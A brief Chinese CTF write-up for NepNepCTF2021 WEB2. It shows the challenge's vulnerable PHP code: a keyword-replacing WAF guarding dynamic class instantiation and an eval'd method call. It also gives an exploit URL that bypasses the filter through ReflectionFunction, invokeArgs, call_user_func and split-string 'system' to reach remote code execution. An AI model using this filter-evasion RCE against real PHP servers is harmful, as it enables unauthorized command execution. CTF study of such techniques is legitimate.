0%

NepNepCTF2021 WEB2

NepNepCTF WEB2

  • 当时非预期了。做个简单的记录利用PHP反射RCE

核心代码如下:

 <?php 
highlight_file(__FILE__);
function waf($s) {
  return preg_replace('/sys|exec|sh|flag|pass|file|open|dir|2333|;|#|\/\/|>/i', "NepnEpneP", $s);
}
if(isset($_GET['a'])) {
  $_ = waf($_GET['a']);
  $__ = waf($_GET['b']);
  $a = new $_($__);
} else {
  $a = new Error('?');
}
if(isset($_GET['c']) && isset($_GET['d'])) {
  $c = waf($_GET['c']);
  $d = waf($_GET['d']);
  eval("\$a->$c($d);");
} else {
  $c = "getMessage";
  $d = "";
  eval("echo \$a->$c($d);");
}
?>
  • PHP反射给出的Demo简单修改一下就能执行任意函数:
<?php
$function = new ReflectionFunction('system');
echo $function->invoke("whoami");
?>
  • 但是题目过滤了sys等关键字,可以另辟蹊径使用invokeArgs配合call_user_func通过拼接字符串的方式绕过过滤执行任意代码。例如:
<?php
$function = new ReflectionFunction('call_user_func');
echo $function->invokeArgs(array('s'.'y'.'s'.'tem','whoami'));
?>

WX20210423-110838@2x

  • EXP
index.php?a=ReflectionFunction&b=call_user_func&c=invokeArgs&d=array(%27s%27.%27y%27.%27s%27.%27tem%27,%27cat%20/f%27.%27lag%27)